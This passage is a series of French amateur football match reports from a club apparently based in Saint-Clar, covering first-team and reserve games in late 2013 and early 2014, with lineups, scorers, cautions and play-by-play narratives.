Equipe: 1. L. Gamot, 2. P. Pinto, 3. M. Berto, 4. JF. Jouet, 5. V. Taupiac (Cap), 6. T. Hrodej, 7. F. Moussaron, 8. A. Serra, 9. C. Maillasson, 10. C. Metge, 11. V. Lucas. Rempl: 12. M. Xompero, 13. D. Solagna, 14. J. Sousa, Coach: C. Boukkera But: C.Metge (60ème) Avertissement: A.Serra (Faute à répétition) Sur un terrain à la limite du praticable où les rebonds sont quasi inexistants, les joueurs locaux sont les premiers à se mettre en action, sur une balle en profondeur au sol dans le dos de la défense centrale St Claraise innovante pour l’occasion en l’absence des titulaires habituels, l’attaquant local tire mais “Lolo” sorti à sa rencontre détourne du bout du pied en corner, le ton est donné. St Clar réplique, “Alexis” sur son côté droit repique dans l’axe et centre, “Clem” à l’affut vient couper la trajectoire devant le gardien, mais le rebond capricieux lui fait trop enlever sa frappe qui passe au dessus des buts. Le jeu est compliqué de part et d’autre, le manque de rythme se fait sentir et l’état du terrain n’arrange pas la chose pour les 22 acteurs. On se rapproche de la demi heure de jeu quand Riscle obtient un coup franc au 25m, le tireur trouve son coéquipier étrangement seul au second poteau qui propulse le ballon de la tête au fond des filets, 1-0. Les joueurs du Sporting essayent de mettre la pression sur les buts de Riscle, notamment par “Mouss” absent lors du match de l’équipe fanion à Manciet du week-end dernier mais qui est venu aider ses copains de l’équipe II à Riscle mais malgré toute son envie et sa bonne volonté rien ne passe. Au contraire juste avant la mi-temps, sur un joli décalage de l’attaque locale, l’ailier droit seul de tout marquage rate son face à face avec “Lolo” et envoie son tir au ras du poteau. Mi-temps: 1-0. Au retour des vestiaires, Riscle attaque tambour battant ce second acte par rapport aux jaunes et rouges l’esprit sûrement encore dans les vestiaires et au bout de 1mn de jeu, sur un centre en retrait dans la surface, l’attaquant vient doubler le score, 2-0. Riscle continue son pressing, sur une frappe enroulée en coin de l’attaquant au 10m “Lolo” touche le cuir qui vient s’écraser sur le poteau. Sur un corner rentrant, les joueurs locaux touchent encore le poteau. Après la tempête, les joueurs du Sporting ressortent la tête de l’eau et sur un télescopage entre le gardien et son défenseur, “Clem” récupère le ballon et vient marquer dans le but vide, 2-1. La paire “Jeff-Taupi” en défense centrale récupère pas mal de ballon, mais le jeu offensif St Clarais est pauvre seul “Clem” surnage et à 15mn de la fin du match sur une belle anticipation, il récupère le ballon au 18m, rentre dans la surface mais loupe son face à face avec le goal, dommage. Malgré un ultime corner pour les joueurs St Clarais en fin de match mais mal négocié, plus rien ne sera marqué. Défaite plutôt logique sur l’ensemble du match marqué par le manque de condition physique et de rythme des joueurs, il va falloir vite reprendre le chemin de l’entraînement que cela soit en salle ou sur le terrain annexe…
Le terrain de Riscle à la limite du praticable
Résultat du week-end (22/02/14):
Une reprise compliquée !
Pour ce retour sur les terrains après cette trêve de un mois et demi imposée par les conditions climatiques, seule l’équipe fanion était de sortie ce week-end, un déplacement à Manciet pas si simple que cela à négocier pour ce retour à la compétition.
CHAMPIONNAT D’EXCELLENCE: MANCIET – ST CLAR: 2-1
Equipe: 1. Bap. Péotta, 2. A. Davasse, 3. R. Clavel, 4. F. Larribeau, 5. Benj. Péotta, 6. Y. Abdou, 7. L. Fabbro, 8. C. Malateste, 9. N. Cantaloup (Cap), 10. N. Armengol, 11. A. Thomeret. Rempl: 12. H. Mancey, 13. V. Taupiac, 14. L. Delavat, Coach: J.Blancard But: A.Thomeret (37ème) Avertissement: Y.Abdou (Tacle dangereux) Sur un terrain plus qu’honorable vu les conditions climatiques de ces derniers temps, les joueurs du Sporting sont les premiers à se mettre en action notamment par “Nico” qui récupère des ballons suite à des coups francs excentrés, mais ses frappes passent largement au dessus. Les locaux usent de longs ballons sur leur attaquant de pointe mais ses remises sont approximatives et inquiètent peu la défense St Claraise. “Kinou” et “Yass” dominent le milieu de terrain et “Jeantho” est omniprésent sur son côté. Le rythme du match retombe vite sûrement dû au manque de compétition. On vient de dépasser la demie heure de jeu quand suite à un coup franc mal renvoyé par la défense de Manciet, “Jeantho” au 25m décoche une reprise du gauche qui vient se loger dans la lucarne, 0-1. Ce but a le don de booster les jaunes et rouges et “Yass” part dans des percées plein axe mais les locaux n’hésitent pas à le stopper parfois irrégulièrement sans que l’arbitre du centre ne bronche. Et sur l’une d’elle juste avant la mi-temps, “Yass” arrive au 18m mais par manque de lucidité oublie “Chamako” et “Jeantho” à sa gauche démarqués de tout marquage et préfère tenter la frappe que le gardien stoppera sans problême, dommage. Mi-temps: 0-1. Au retour des vestiaires , les St Clarais maîtrisent leur match mais Manciet commence à reprendre la possession de la balle. Et à l’heure de jeu sur une balle en profondeur par dessus la défense bien statique, l’attaquant local partit en profondeur envoie une frappe en pleine lucarne de “Bats”, 1-1. Ragaillardis par ce but, les joueurs locaux trouvent un second soufle et mettent la pression sur les joueurs du Sporting qui eux encaissent moralement le coup de voir leur adversaire revenir à la marque. Manciet met le pied sur le ballon et la réaction des jaunes et rouges est très brouillonne. Il reste 10mn à jouer quand suite à un raid solitaire sur le côté droit, un joueur de Manciet passe plusieurs joueurs de St Clar et décoche une frappe flottante en coin des 30m qui vient se loger dans la lucarne de “Bats”, 2-1. Les jaunes et rouges poussent dans les dernières minutes et obtiennent plusieurs corners qui ne donneront rien, même une main dans la surface d’un joueur local à la dernière minute ne fera pas réagir l’arbitre central , le score ne bougera plus, 2-1. Une reprise compliquée pour les joueurs de l’équipe fanion qui essayeront de se rattraper le week-end prochain sur le terrain de Pavie…si le temps le permet.
“Jeantho” auteur d’un splendide but
Résultats du week-end (11/01/14):
Une reprise poussive pour les équipes du Sporting !
Pour ce retour sur les terrains après la trêve hivernale, les équipes du Sporting ont eu un peu de mal à remettre la machine en route. L’équipe fanion à ramener un nul de Gimont, tandis que les réservistes ont été tenus en échec sur leur pelouse par Lectoure lors du derby.
CHAMPIONNAT DE PROMOTION EXCELLENCE : ST CLAR II – LECTOURE : 0-0
Equipe : 1. L. Gamot, 2. P. Pinto, 3. M. Berto, 4. PM. Sabarros, 5. A. Davasse, 6. C. Malateste (Cap), 7. J. Lasserre, 8. T. Hrodej, 9. V. Lucas, 10. J. Sousa, 11. A. Serra. Rempl: 12. D. Solagna, 13. M. Xompero, 14. C. Maillasson, Coach: C. Boukkera But: Avertissement: Prévue initialement à Lectoure, le match fut inversé pour cause d’un arrêté municipal. L’arbitre officiel ne s’étant pas déplacé, “Mimi” le remplace au pied levé. Le match commence timidement côté St Clarais, Lectoure impose un fort pressing et il faut toute la vigilance de la défense du Sporting pour anéantir les actions des visiteurs. Lectoure continue leur pressing et les corners s’enchaînent, 5 d’affilée mais les visiteurs ne trouvent pas la brêche. Les St Clarais ont un sursaut d’orgeuil, “Bono” part en profondeur et use de sa vitesse, centre pour “Alexis” mais celui-ci est trop juste pour amorcer une frappe. “Kinou” y va d’une demi volée de 25m mais sa frappe en cloche rase la barre. La mi-temps est sifflée sur ce score de parité 0-0. Après la pause des citrons, même physionomie que le premier acte, Lectoure attaque et il faut toute la vigilance de “Lolo” pour éviter plusieurs fois l’ouverture du score. Les visiteurs commencent à baisser de rythme et les joueurs du Sporting se réveillent enfin. Tout d’abord par “Kinou”, son coup franc avec rebond frôle la lucarne. Les corners s’enchaînent côté St Clarais mais rien ne passe, la défense visiteuse ne prend aucun risque et renvoie tout. La fin du match est sifflée sur se score nul de 0-0. Un retour à la compétition difficile pour les réservistes qui recevront Mirande II le week-end prochain. Ils essayeront de continuer leur série d’invincibilité à domicile. Merci à “Mimi” de s’être dévoué pour diriger la rencontre !
“Bernard” l’homme du match lors de ce derby
CHAMPIONNAT D’EXCELLENCE : GIMONT II – ST CLAR : 1-1
Equipe : 1. Baptiste. Peotta, 2. R. Clavel, 3. B. Sabarros, 4. F. Larribeau, 5. Benjamin. Peotta, 6. F. Moussaron (Cap), 7. JF. Jouet, 8. A. Thomeret, 9. N. Armengol, 10. Y. Abdou, 11. L. Delavat. Rempl: 12. H. Mancey, 13. N. Cantaloup, 14. L. Fabbro, Coach: J.Blancard But: N.Cantaloup (80ème) Avertissement: Sur un terrain de Gimont très dégradé par le match précedent, les joueurs du Sporting entament bien le match et “Mouss” est tout prêt d’ouvrir la marque (son tir vient mourir sur le poteau). C’est ensuite “Ludo” qui perd son duel avec le gardien. Les Gimontois procèdent par contre mais la défense Saint Claraise est vigilante et la pause est atteinte sur le score de 0 à 0. A la reprise, du fait de l’état du terrain, il devient de plus en plus difficile de poser le jeu et sur une perte de balle, “Papy” concède un coup-franc. Celui-ci, parfaitement tiré, finit sa course au fond des filets, 1-0. Les jaunes et rouges ne se découragent pas et, 10 mn plus tard, “Nico”, fraichement entré en jeu, égalise en prenant de vitesse la défense de Gimont, 1-1. Malgré de bonnes intentions de part et d’autre, plus rien ne sera marqué dans ce match joué dans un bon état d’esprit. Prochain match, samedi au Stade de Labarthète contre Eauze qui est revenu tout près des premières places…
“Nico” auteur de l’égalisation et meilleur buteur du club avec 9 buts
Résultat du week-end (21/12/13):
Les réservistes passeront la trêve au chaud !
Pour ce match en retard de championnat face à un concurrent direct au maintien, les réservistes du Sporting n’ont pas tremblé contre Ordan Larroque et ont maintenu leur rythme de croisière à domicile en dominant les débats. Une victoire importante comme la signifié “Coach Bouki” en rajoutant que le maintien se gagnera à domicile…
CHAMPIONNAT DE PROMOTION EXCELLENCE: ST CLAR II – ORDAN LARROQUE: 3-0
Equipe: 1. L. Gamot, 2. D. Solagna, 3. M. Berto, 4. A. Davasse, 5. PM. Sabarros, 6. JF. Jouet (Cap), 7. F. Auricane, 8. M. Xompero, 9. C. Suzes, 10. A. Serra, 11. T. Hrodej. Rempl: 12. C. Maillasson, 13. P. Pinto, 14. L. Fabbro, Coach: C. Boukkera Buts: C.Suzes (10ème), F.Auricane (75ème), A.Serra (80ème) Avertissements: L.Gamot (Anti-jeu), P.Pinto (Tacle dangereux) Le match commence timidement, les joueurs du Sporting sont bien en place et attendent leurs adversaires, les buts pris dans les toutes premières minutes de jeu lors des derniers matchs ont servi de leçon… Au bout de 10mn sur une attaque des visiteurs, “Matt” dégage le ballon en profondeur, “Cissou” sent bien le coup et part dans le dos de la défense, et d’un splendide tir de volée en lob des 35m vient tromper le gardien avancé, 1-0. Les visiteurs poussent leurs attaques notamment par des ballons en profondeur, mais la défense St Claraise veille. “Lolo” doit s’employer sur un coup franc lointain d’Ordan Larroque et le détourner en corner. Les joueurs du Sporting procèdent par contre, bien lancés en profondeur par “Francou”, “Cissou” est tout près de marquer le but du break mais le défenseur s’interpose. Juste avant la mi-temps, sur un joli décalage de “Jeff”, “Lolo” de retour sur les terrains après de longs mois d’absence dû à une vilaine blessure rate son enroulé du droit…Mi-temps: 1-0. Après la pause, les visiteurs jouent le tout pour le tout et attaquent à tout va, mais “Bernard et Nono” sont dans un grand soir et ils anéantissent toutes les actions. Après l’heure de jeu, sur une contre attaque, “Lolo” part sur son côté gauche, rentre dans la surface et tire mais le ballon est détourné par un défenseur sur la ligne. A charge de revanche, quelques minutes après, “Lolo” encore lui refait le même coup mais sert “Francou” au 18m qui d’un tir croisé du gauche marque le but du break, 2-0. Les visiteurs sont acculés sur leur but, “Christo” rentré en jeu avec plein d’envie est tout près d’aggraver le score. Les St Clarais ne baisse pas de rythmre, “Micka” part de son camp et suite à un redoublement de passe transmet le ballon à “Christo” sur le côté” droit, celui-ci sert en profondeur “Alexis” qui d’un petit piqué de l’extérieur du gauche vient battre le gardien sortit à sa rencontre, 3-0. Plus rien ne sera marqué dans la rencontre. Victoire importante des réservistes qui leur permet de se classer confortablement en milieu de tableau et donc de passer la trêve des confiseurs au chaud. Prochain match le 11 janvier 2014 à Lectoure pour une rencontre importante d’entrée en espérant une présence assidue aux entraînements pour bien débuter l’année…
Résultats du week-end (14/12/13):
L’équipe fanion marque le pas et les réservistes restent intraitable à domicile !
Après un week-end dernier dédié aux coupes, les joueurs du Sporting retrouvaient les joutes du championnat. L’équipe fanion recevaient les voisins fleurantins pour un derby de haut de tableau. Les réservistes eux, recevaient Duran ancien pensionnaire d’Excellence pour un match important pour le maintien.
CHAMPIONNAT DE PROMOTION EXCELLENCE : ST CLAR II – DURAN : 4-2
Equipe : 1. M. Sameke, 2. H. Mancey, 3. M. Berto, 4. PM. Sabarros, 5. A. Davasse, 6. JF. Jouet, 7. V. Taupiac (Cap), 8. T. Hrodej, 9. C. Metge, 10. J. Sousa, 11. M. Xompero. Rempl: 12. C. Suzes, 13. A. Serra, 14. D. Solagna, Coach: C. Boukkera Buts: C.Metge (55ème) (75ème) (80ème); H.Mancey (60ème) Avertissement: Le match démarre sur les chapeaux de roues, comme à l’accoutumé depuis maintenant quelques matchs, la défense St Claraise n’entre pas dans son match et il faut toute la vigilance de “Marcel” pour venir sortir dans les pieds de l’attaquant visiteur. Rebelote quelques minutes après, la première incursion côté gauche n’ayant pas servi d’exemple, l’attaquant de Duran réédite la même chose, “Marcel” sort, se télescope avec “Taupi”, l’attaquant visiteur en profite, suit l’action et marque le but, 0-1. Les joueurs du Sporting se réveillent et commencent à pousser leurs actions, notamment par “Tom” sur le côté et “Clem” aux avant postes. Au quart d’heure de jeu, sur un coup franc excentré, “José” est percuté dans la surface, l’arbitre ne bronche pas… Contre attaque de Duran qui obtient un coup franc dangereux, le joueur tire, le mur St Clarais dévie le ballon dans ses propres filets, 0-2. Les rouges et jaunes tentent des frappes de loin, mais elles sont trop approximatives pour inquiéter le gardien visiteur. Duran sur une erreur défensive St Claraise croit inscrire le 3ème buts du match, mais l’attaquant est logiquement signalé hors-jeu. Mi-temps. Au retour des vestiaires, les changements tactiques et les changements de joueurs de Coach “Bouki” vont s’avérer payant, l’entrée d’ “Alexis” dynamisme l’attaque St Claraise. Les rouges et jaunes obtiennent un coup franc, “Nono” trouve “Clem” dans la surface qui d’une jolie tête lobée vient tromper le gardien, 1-2. Les joueurs du Sporting se remobilisent, “Jeff” avec toute son expérience ratisse tous les ballons en milieu de terrain et 5mn après la réduction du score, sur un joli service d’ “Alexis” plein axe, “Henri” repositionné en milieu de terrain vient d’un plat du pied au 18m égaliser pour St Clar, 2-2. S’ensuit quelques minutes de flottement mais “Marcel” veille dans ses buts. A la 75ème minute, “Alexis” le long de la ligne de touche se positionne sur son pied gauche et dépose un centre de 25m sur la tête de “Clem” au deuxième poteau qui trompe magistralement le gardien de Duran, 3-2. Les joueurs du Sporting ont pris physiquement le pas sur les joueurs de Duran et à 10mn de la fin du match sur un dégagement obus de “Marcel”, “Alexis” décale “Clem” qui vient fusiller le gardien, même les filets lâchent sur le coup, se qui fera poser une réserve par l’attaquant de Duran auprès de l’arbitre en indiquant que le ballon n’était pas rentré dans les cages…l’arbitre valide le but, 4-2. Plus rien ne sera marqué. Victoire très importante face à un concurent direct en vue du maintien, les réservistes se replacent dans le ventre mou de la poule. Week-end prochain, match en retard à domicile face à un autre adversaire direct au maintien, Ordan Larroque. Une victoire permettrait de bien passer les fêtes au chaud, il ne reste plus qu’à…
CHAMPIONNAT D’EXCELLENCE : ST CLAR – FLEURANCE II : 0-0
Equipe : 1. Baptiste. Peotta, 2. R. Clavel, 3. B. Sabarros, 4. F. Larribeau, 5. Benjamin. Peotta, 6. F. Moussaron (Cap), 7. C. Malateste, 8. A. Thomeret, 9. N. Armengol, 10. Y. Abdou, 11. L. Delavat. Rempl: 12. R. Boukkera, 13. N. Cantaloup, 14. F. Auricane, Coach: J.Blancard But: Avertissements: R. Boukkera (Charge irrégulière), F.Larribeau (Tacle dangereux) Face à une équipe Fleurantine renforcée de 5 voire 6 éléments évoluant en championnat DHR, coutumière du fait lors des derbys Lomagnols, la partie n’allait pas être simple pour les joueurs du Sporting. Les visiteurs sont les premiers à être dangereux sur corner, mais la tête du défenseur passe au dessus des buts de “Bats”. St Clar réplique, “Jeantho” dépose le cuir sur la tête de “Chamako” au deuxième poteau, mais le gardien visiteur sort la parade. Les joueurs du Sporting continuent leur pressing, “Ludo” hérite du ballon dans la surface veut remettre en retrait mais il est bousculé dans le dos et s’écroule dans la surface, l’arbitre ne bronche pas. “Yass” aux avant postes est omni présent, sur une action il prend la poudre d’escampette sur le côté droit face aux défenseurs, repique dans la surface, mais se mélange les pinceaux au derniers moment face au gardien. S’ensuit un faux rythme où les fautes vont se multiplier de part et d’autres, un carton blanc de chaque côté va être sorti. Mi-temps. Après la pause pâtes de fruits chère à “Bats”, les blancs et rouges de St Clar vont se procurer plusieurs occasions. “Yass” encore lui part plein axe et se retrouve seul face au gardien, mais son tir est trop croisé. “Mouss” à grandes enjambées part sur le côté gauche, centre en retrait, le premier tir est contré, “Jeantho” au 20m récupère le cuir mais sa frappe est trop enlevée. On se rapproche de la fin du match, Fleurance procède par contre et utilise la vitesse de ses attaquants, mais la défense St Claraise ne lâche pas et anéantit les actions. Les joueurs du Sporting veulent arracher la victoire, “Ludo” est bien servi en profondeur mais son tir n’est pas cadré. “Chamako” essaye par sa vitesse de passer, mais la défense visiteuse tient bon. La partie se termine sur ce match nul de 0-0. Les St Clarais ont tout donné mais ont eu du mal à se libérer dans ce derby. Les joueurs de l’équipe fanion restent invaincus dans cette première partie du championnat qui est loin d’être terminé. Prochain match début janvier face à Gimont II.
Résultat du week-end (07/12/13):
Lourde défaite en Coupe du Midi !
Ce match à Aureilhan, équipe évoluant également en Excellence, qui aurait pu nous valoir un beau spectacle, a tourné au cauchemar pour l’équipe fanion.
32ème de FINALE DE LA COUPE DU MIDI: AUREILHAN – ST CLAR : 7-0
Equipe : 1. Baptiste Peotta, 2. R. Clavel, 3. R. Boukkera , 4. A. Davasse , 5. Benjamin Peotta, 6. H. Mancey, 7. F. Moussaron (cap), 8. L. Delavat, 9. J. Sousa, 10. C. Maillasson, 11. A. Thomeret, Rempl : 12. S. Portillo, 13.M. Xompero. Coach : J. Blancard But : Avertissement : H. Mancey (Tacle dangereux) Que dire de ce match où les locaux ont fait valoir toutes leurs qualités face à des Saint-Clarais courageux mais trop affaiblis par les nombreuses absences (seuls 6 titulaires habituels sur la feuille de match). Durant les 90 mn, Aureilhan a dominé la partie grâce à un collectif au service de jeunes joueurs alliant vitesse et technique. Nul doute que cette équipe retrouve très rapidement la Promotion Ligue. Et sans un « Bats » des grands soirs qui a multiplié les arrêts et interventions décisives, l’addition aurait pu être beaucoup plus lourde. En résumé, un match à oublier très vite. Afin de remercier les joueurs qui ont fait ce long déplacement, les Co-Présidents ont décidé de leur donner les équipements (maillot, short et chaussettes) offerts par la Ligue. Pour finir, un coup de chapeau à la poignée de supportrices et supporters fidèles qui ont bravé le froid pour soutenir leur équipe. Les dirigeants du SCSC tiennent aussi à féliciter le club d’Aureilhan et ses dirigeants pour leur accueil très chaleureux et la bonne ambiance qui a régné autour de ce match et leur souhaitent bonne chance pour la suite de la saison.
Résultats du week-end (30/11/13):
L’équipe fanion en costaud et les réservistes toujours à la peine à l’extérieur !
Après un week-end de repos dût aux intempéries, les joueurs de l’équipe fanion se déplaçaient chez le co-leader de la poule à la Vallée de l’Arrats pour le match choc de cette journée. Tandis que les réservistes se rendaient à Preignan pour affronter le SCPAS II leader de la poule.
CHAMPIONNAT DE PROMOTION EXCELLENCE : SCPAS II – ST CLAR II : 2-1
Equipe : 1. M. Sameke, 2. D. Solagna, 3. M. Berto, 4. PM. Sabarros, 5. V. Taupiac (Cap), 6. H. Mancey, 7. C. Malateste, 8. T. Hrodej, 9. M. Xompero, 10. S. Buttigieg, 11. C. Suzes. Rempl: 12. C. Maillasson, 13. M. Cros, 14. S. Portillo, Coach: C. Boukkera But: M.Xompero (80ème) Avertissement: H.Mancey (Tacle dangereux) Le début du match commence sur les chapeaux de roues, dès la 1ere mn, les locaux ouvrent le score sur un joli mouvement collectif, 1-0. Les jaunes et rouges piqués au vif et réveillés par ce but, posent leur jeu malgré un terrain très compliqué mais le dernier geste est trop approximatif pour pouvoir inquiéter le portier local. La partie se concentre au milieu de terrain, les locaux usant de longs ballons sur leur attaquant de pointe mais la défense St Claraise veille. A la demi-heure de jeu, sur un bon mouvement côté droit de « Kinou », « Stephen » au 20m tire mais sa frappe est trop enlevée. On s’approche de la mi-temps, suite à un corner « Henri » dégage le ballon de la surface mais sa frappe vrille et vient toucher son bras, l’arbitre désigne le point de pénalty. Pénalty transformé en deux fois, 2-0. Mi-temps. Au retour des vestiaires sur un terrain de plus en plus compliqué pour les appuis des joueurs, les occasions se font rares, mais les joueurs du Sporting ne lâchent rien. Et à 10mn de la fin du match, sur une déviation de « Marcel », « Christo » transmet le ballon à « Micka » qui ajuste le gardien de près, 2-1. Les jaunes et rouges vont pousser et obtenir un dernier coup franc dangereux, mais malgré l’application de « Kinou » il ne donnera rien. Fin du match 2-1. Nouvelle défaite à l’extérieur mais avec de l’amélioration par rapport au dernier match… Samedi prochain retour à la Coupe des Réserves, déplacement à Solomiac II, défaite interdite.
CHAMPIONNAT D’EXCELLENCE : VALLEE DE L’ARRATS – ST CLAR : 2-2
Equipe : 1. Baptiste. Peotta, 2. R. Clavel, 3. A. Davasse, 4. F. Larribeau, 5. Benjamin. Peotta, 6. F. Moussaron (Cap), 7. B. Sabarros, 8. A. Thomeret, 9. N. Armengol, 10. N. Cantaloup, 11. L. Delavat. Rempl: 12. R. Boukkera, 13. J. Souza, 14. A. Serra, Coach: J.Blancard Buts: L.Delavat (17ème), F.Larribeau (55ème) Avertissements: A.Davasse (Tacle dangereux), N.Cantaloup (Geste d’humeur), R.Boukkera (Tacle dangereux) Dès le coup d’envoi, les locaux s’installent dans le camp Saint-Clarais et dès la 2ème minute profitent d’une absence défensive pour ouvrir la marque, 1-0. Face à un concurrent direct, le match ne pouvait pas commencer de pire manière. Galvanisés par ce but, Aubiet presse nos joueurs très haut empêchant toute relance propre et 5mn plus tard, il faut toute la classe de « Bats » pour éviter le deuxième but. Durant un quart d’heure, la défense Saint-Claraise aura toutes les peines du monde à contenir les rapides attaquants locaux. Heureusement, « Bats » veille dans les buts et soulage son équipe à plusieurs reprises. A la 17ème minute, sur un contre rapidement mené, c’est « Ludo » qui d’un intérieur du gauche nous rappelle qu’il est un buteur en égalisant, 1-1. Dès lors, le match prend une nouvelle intensité physique et les duels deviennent plus rudes, obligeant l’arbitre à sévir régulièrement. Juste avant la pause, bien lancé en profondeur, « Chamako » échappe à la défense mais perd son duel avec le gardien en croisant trop sa frappe. Le début de la seconde période voit les joueurs du Sporting mieux en place et plus présents dans les duels. A la 55ème minute, sur un coup-franc bien placé, « Fabien » s’élève plus haut que tout le monde et, de la tête, donne l’avantage à son équipe, 1-2. Il faut seulement 10 mn à Aubiet pour égaliser. Suite à une balle perdue, « Bats » repousse un premier tir mais ne peut rien sur la reprise qui suit, 2-2. Dès lors, le match devient de plus en plus haché avec une multiplication des fautes et des contestations, ce qui contraint l’arbitre à punir un Aubietain d’un carton blanc. On se dit que à 11 contre 10, c’est peut-être l’occasion pour les jaunes et rouges de marquer un 3ème but, mais les locaux sauront casser le jeu pour préserver ce match nul. Une mention spéciale à l’arbitre de la rencontre qui a su parfaitement gérer un match très tendu. Ce résultat laisse les deux équipes co-leaders, mais avec un petit avantage pour Saint-Clar grâce à ce match nul. Le week-end prochain, place à la Coupe du Midi (32ème de finale) avec un déplacement à Aureilhan (65) qui est également en tête de son Championnat Excellence.
Résultat du week-end (16/11/13):
L’équipe fanion passe tout près de la correctionnelle !
Vu les conditions climatiques, un seul match a été joué ce week-end au Stade de Labarthète et les joueurs de l’équipe fanion ont frôlé la correctionnelle face à leurs voisins de Miradoux. Il a fallu attendre les dernières minutes du match pour voir les St Clarais revenir au score et égaliser.
CHAMPIONNAT D’EXCELLENCE : ST CLAR – MIRADOUX : 2-2
Equipe : 1. Baptiste. Peotta, 2. A. Thomeret, 3. B. Sabarros, 4. A. Virelaude, 5. Benjamin. Peotta, 6. F. Larribeau, 7. C. Malateste, 8. F. Moussaron (Cap), 9. N. Armengol, 10. N. Cantaloup, 11. L. Delavat. Rempl: 12. R. Boukkera, 13. Y. Abdou, 14. F. Auricane, Coach: J. Blancard Buts: Y.Abdou (88ème), F.Moussaron (92ème) Avertissement: N.Armengol (Tacle dangereux) Sur un terrain gras mais en bon état en général, les jaunes et rouges prennent possession du ballon. La première occasion est pour Miradoux, sur un contre, l’attaquant adverse bien décalé tire en angle fermé, mais « Bats » capte le ballon sans problème. Les St Clarais répliquent, « Chamako » part en dribble sur le côté gauche, rentre dans la surface et centre au second poteau pour « Ludo » mais sa frappe est trop enlevée pour inquiéter le gardien. Le match tombe dans un faux rythme mais à la demi-heure de jeu, sur une longue touche de « Benben » dans la surface « Mouss » est percuté dans le dos et s’écroule, pénalty. « Chamako » s’élance mais le gardien adverse détourne le tir. Miradoux ragaillardi, se libère et juste avant la mi-temps sur un joli travail de leur ailier vient ouvrir la marque, 0-1. Mi-temps. Après la pause, les joueurs de St Clar essayent d’égaliser mais la construction est trop brouillonne, seul les corners de « Jeantho » apportent le danger dans la surface mais le gardien de Miradoux repousse tout. A l’heure de jeu, sur une contre-attaque, l’attaquant de Miradoux se joue de l’arrière garde de St Clar et s’écroule dans la surface, pénalty…joliment transformé en lucarne, 0-2. On ne voit pas comment les jaunes et rouges vont pouvoir revenir au score…A 15mn de la fin, le milieu défensif de Miradoux est expulsé, il reçoit un deuxième carton jaune pour des fautes à répétition. L’arrière garde Miradouzaine se désorganise et « Yass » profite du centre en retrait de « Chamako » bien lancé en profondeur pour venir réduire la marque en fin de match, 1-2. On est dans les arrêts de jeu, les St Clarais poussent et sur un cafouillage, le ballon touche le bras du défenseur de Miradoux, l’arbitre désigne le point de pénalty. « Mouss » prend le ballon et tire, le gardien part du bon côté mais le ballon se faufile sous son corps, 2-2. Malgré encore 2mn d’arrêt de jeu, plus rien ne sera marqué. L’équipe fanion passe tout près de la correctionnelle encore une fois après le match de Manciet gagné sur le fil, à méditer et à garder en mémoire pour la suite du championnat… Malgré un match terne et pauvre en occasion côté St Clarais, le sursaut d’orgueil en fin de match qui a permis de revenir au score montre qu’il n’y a pas tout à oublier dans ce match. Week-end prochain déplacement à Pavie II, un match compliqué face à une équipe en besoin de points, rigueur et efficacité seront les maîtres mots de cette rencontre.
Résultats du week-end (09/11/13):
La une sur sa lancée à domicile et les réservistes à la peine à l’extérieur !
Après un arrêté municipal à Manciet, le match de l’équipe fanion fut inversé et les jaunes et rouges dans la douleur à domicile sont venus à bout d’une équipe de Manciet accrocheuse. Les réservistes eux sont revenus bredouille de leur déplacement chez un autre promu de la poule, St Sauvy.
CHAMPIONNAT DE PROMOTION EXCELLENCE: ST SAUVY – ST CLAR II : 1-0
Equipe : 1. L. Gamot, 2. PM. Sabarros, 3. M. Berto, 4. A. Davasse, 5. F. Auricane, 6. V. Taupiac (Cap), 7. JF. Jouet, 8. T. Hrodej, 9. J. Lasserre, 10. S. Buttigieg, 11. C. Suzes. Rempl: 12. P. Pinto, 13. J. Sousa, 14. M. Xompero, Coach: C. Boukkera But: Avertissement: P. Pinto (Carton Rouge) Le début du match commence sous une pluie battante, le vent se mêlant à la partie. Les jaunes et rouges sont bien en place et agressifs sur le porteur du ballon. Les joueurs locaux profitent du vent pour tenter des frappes lointaines mais « Lolo » veille. Les St Clarais sont dangereux sur coup de pied arrêté notamment par « François ». Il faut attendre la demi-heure de jeu pour voir la première action construite du match qui est l’œuvre des locaux et il faut toute la vigilance de « Lolo » qui détourne le tir croisé en corner. Les réservistes essayent de riposter, mais c’est bien trop brouillon pour inquiéter le portier local. On s’approche de la mi-temps, sur une balle en profondeur, la défense St Claraise est trop courte mais « Lolo » sort la parade devant l’attaquant de St Sauvy. Mi-temps : 0-0. Au retour des vestiaires, les locaux accélèrent et la défense du Sporting tient bon. Mais quelques minutes plus tard, sur un ballon en profondeur dévié du dos par « Matt », l’attaquant local récupère le ballon et avec un peu de chance lobe « Lolo » des 25m, 1-0. Les joueurs du Sporting se jettent à l’attaque avec envie mais les occasions sont vraiment trop rares pour pouvoir égaliser. « Titcho » sur un tacle maladroit se fait expulser à 5mn de la fin du match. Les joueurs de St Sauvy vont gérer leur petit but d’avance jusqu’au coup de sifflet final. Défaite 1-0 pour les réservistes toujours à la recherche d’un résultat à l’extérieur. Samedi prochain, réception d’Ordan Larroque, victoire impérative à la maison, le maintien en passera par là.
CHAMPIONNAT D’EXCELLENCE : ST CLAR – MANCIET : 3-1
Equipe : 1. Baptiste. Peotta, 2. A. Thomeret, 3. B. Sabarros, 4. A. Virelaude, 5. Benjamin. Peotta, 6. F. Moussaron (Cap), 7. C. Malateste, 8. R. Boukkera, 9. N. Cantaloup, 10. L. Delavat, 11. C. Metge. Rempl: 12. N. Armengol, 13. Y. Abdou, 14. F. Larribeau, Coach: J.Blancard Buts: F.Moussaron (77ème), Y.Abdou (81ème), N.Armengol (84ème) Avertissement: A.Thomeret (Désapprobation) Sous une pluie fine, Saint-Clar débute face au vent et se retrouve tout de suite pressé par des visiteurs présents dans tous les duels. Les jaunes et rouges n’arrivent pas à conserver le ballon, le rendant systématiquement à l’adversaire qui utilise très bien l’avantage du vent pour mettre la défense en danger et très logiquement ouvrir la marque à le 20ème minute. En fin de première période, Saint-Clar semble retrouver un petit peu son jeu mais sans réussir à s’approcher des buts adverses. A la pause, « Coach Julien » décide de lancer « Yass » et « Chamako » à la place de « Robi » et « Kinou ». Avec l’appui du vent, les joueurs du Sporting dominent cette période et la vitesse des entrants met la défense Manciétoise à rude épreuve. Mais le talentueux et « toujours jeune » gardien visiteur (JP, quand reprends tu une licence joueur…?) réalise de superbes arrêts et maintient son équipe à flot. Et c’est à 10 contre 10 (suite à 1 carton blanc de chaque côté), que « Mouss » égalise de la tête suite à un premier tir dévié par le gardien sur sa transversale. Dès lors, les visiteurs baissent de pied physiquement et encaissent un second but par « Yass » qui reprend du plat du pied un centre millimétré de « Chamako ». 3mn plus tard, c’est « Chamako » qui aggrave le score en reprenant le seul ballon relâché par le gardien. 